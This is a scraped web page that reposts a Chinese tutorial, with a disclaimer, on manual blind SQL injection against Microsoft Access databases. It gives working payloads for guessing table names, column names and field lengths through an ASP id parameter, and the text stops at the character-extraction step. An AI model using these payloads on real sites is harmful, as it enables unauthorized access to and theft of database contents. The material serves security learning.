当前位置: 首页 > news >正文

深圳外贸网站制作价格旅游网站建设翻译

深圳外贸网站制作价格,旅游网站建设翻译,太原seo网站优化,科技公司.net网站源码说明:本文仅是用于学习分析自己搭建的SQL漏洞内容和原理,请勿用在非法途径上,违者后果自负,与笔者无关;本文开始前请认真详细学习《‌中华人民共和国网络安全法》‌及其相关法规内容【学法时习之丨网络安全在身边一图了解网络安全法_中央网络安全和信息化委员会办公室】 。…

说明:本文仅是用于学习分析自己搭建的SQL漏洞内容和原理,请勿用在非法途径上,违者后果自负,与笔者无关;本文开始前请认真详细学习《‌中华人民共和国网络安全法》‌及其相关法规内容【学法时习之丨网络安全在身边一图了解网络安全法_中央网络安全和信息化委员会办公室】 。

MySQL数据库的SQL注入漏洞解析icon-default.png?t=O83Ahttps://blog.csdn.net/xiaochenXIHUA/article/details/141974766?spm=1001.2014.3001.5501 

一、SQL注入常见流程

1.1、寻找SQL注入点

        一般进行SQL注入前,都需要对这些数据库所对应的程序寻找注入点,常见的SQL注入点一般存在于参数输入、输出的位置(如:注册登录、不同页码、参数内容的数据查询、不同页面切换、留言版等内容)。

        SQL注入漏洞的检测方法:【单引号】【or 1=1】【and 1=2】。

        SQL注入的常见位置:http头、cookies、user agent,post提交数据位置;与数据库交互的相关界面(如:注册登录、数据查询展示界面等)。

1.2、SQL注入常见流程

        【1、获取数据库】-->【2、获取数据库对应的表】-->【3、获取数据库表的字段】-->【4、获取字段内容】-->【5、获取账号密码登内容后进行对应的数据库操作(提权、控制、脱库等一切操作)】。

二、Microsoft Access数据库SQL注入

        我们获取到程序的可能注入点,然后使用SQL注入内容进行注入测试(如添加';and 1=1#等内容进行测试看是否报错)。由于access数据库没有其他可以用于存储基础数据的明显库内容(如mysql5.0及其之上版本具有的infomation_schema库【mysql5.0之前的版本没有记录数据库基础数据的库,也只能靠暴力猜解】)所以我们对于access库只能够暴力猜解,一般使用工具进行,如下将介绍手工测试access数据库的SQL注入原理。

2.1、猜解表名称

# 猜解表名称语句(existes表示判断该表是否存在,如果返回错误信息则表示我们猜测的表名称不对,切换另一个表名称继续测试)
and exists(select * from 盲猜的表名称) ## 示例
192.168.3.212/custom.asp?id=4 and exists(select * from users) #
192.168.3.212/custom.asp?id=4 and exists(select * from peopleinfo) #

2.2、猜解字段名称

# 猜解表的字段语句(返回正常则表示猜测的表字段名称存在,否则换另一个名称继续测试)
and exists(select 需猜测的表字段名称 from 确定有的表名称)## 示例:
192.168.3.212/custom.asp?id=4 and exists(select username from users)#192.168.3.212/custom.asp?id=4 and exists(select password from users) -- 

2.3、猜解字段数据长度

猜解字段的数据长度主要是为了给下面使用ASCII码猜解字段内容使用

# 采集字段数据长度
and (select top 1 len(字段名称) from 表名称)>字段长度# 示例
192.168.3.212/custom.asp?id=4 and (select top 1 len(username) from users)>2    //正常
192.168.3.212/custom.asp?id=4 and (select top 1 len(username) from users)>4    //正常
192.168.3.212/custom.asp?id=4 and (select top 1 len(username) from users)>5    //错误(表明该users表的username字段第一行的内容长度是5)

2.4、猜解字段数据内容(低效)

        使用截取字符串函数截取单个字母的ASCII码内容猜解

http://www.yayakq.cn/news/953363/

相关文章:

  • 自已如何做网站著名展厅设计
  • 国内做网站用的程序巫山那家做网站厉害
  • 公司有必要建设网站吗游戏网站排行
  • 媒体软文发布平台青岛公交优化
  • 东莞常平建网站公司可以做引流网站的源码
  • 网站的建设内容移动互联网开发技术是什么
  • 重庆大足网站建设网站外的seo
  • 网站建设补救方法廊坊网站推广
  • 排版漂亮的网站网站制作网站设计
  • 中山网站模板门户网站运营
  • 自助网站免费注册dw php网站开发书籍云盘
  • 建设ftp网站怎么创建数据库网站右侧固定标题怎么做
  • 四川华海建设集团有限公司网站百度旗下有哪些app
  • 微建站平台网站设计建设维护
  • 简历网站免费网络规划设计师资料
  • 济南网站建设正规公司建筑方案ppt模板
  • 在excel表里做网站模板小白学做搭建网站
  • wordpress 建两个网站怎么做网页快捷方式
  • 内蒙古呼和浩特市做网站的公司app软件开发的费用设计
  • 福州 建站 软件简述常用的网络营销方法
  • 如何做公司网站百度推广开发商违约延期交房可以退房吗
  • 设计得很好的企业网站网站设计建设趋势
  • 教育网站开发文档模板如何做自己的淘宝客网站
  • 中山市智能h5网站建设公司广西网站开发软件
  • 河南平价的seo整站优化定制seo网络推广软件
  • 建设监理有限责任公司网站长沙人才市场最新招聘
  • 网站名字怎样做版权临沂企业自助建站系统
  • 诸城网络科技网站建设数字营销公司排行榜
  • 佳木斯建设工程交易中心网站有学给宝宝做衣服的网站吗
  • 家具公司网站模板下载wordpress粘贴word